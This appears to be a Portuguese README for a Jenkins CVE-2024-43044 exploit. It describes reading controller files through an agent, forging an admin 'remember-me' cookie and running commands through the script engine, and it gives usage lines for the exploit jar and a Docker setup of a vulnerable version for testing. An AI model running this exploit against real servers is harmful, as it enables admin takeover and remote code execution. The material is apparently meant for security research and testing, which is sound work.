
Exploit para a vulnerabilidade CVE-2024-43044 no Jenkins
Este é um exploit para CVE-2024-43044, uma leitura arbitrária de arquivos que permite a um agente buscar arquivos do controlador.
O exploit usará a vulnerabilidade para ler arquivos e forjar um cookie de 'remember-me' para uma conta de administrador, obtendo acesso ao mecanismo de script do Jenkins.
Confira o artigo completo em https://blog.convisoappsec.com/en/analysis-of-cve-2024-43044/
mvn package
Exploit Usages:
java -jar exploit.jar mode_secret <jenkinsUrl> <nodeName> <nodeSecretKey>
java -jar exploit.jar mode_attach <jenkinsUrl> <cmd>
java -jar exploit.jar mode_attach <cmd>
Você pode testá-lo em uma versão vulnerável usando o Docker:
docker run -p 8080:8080 -p 50000:50000 --restart=on-failure jenkins/jenkins:2.441-jdk17
Depois de ter um Jenkins em execução, configure um agente.
A conexão controlador/agente pode ser padrão (usando url, nome do nó, segredo) ou via SSH.
.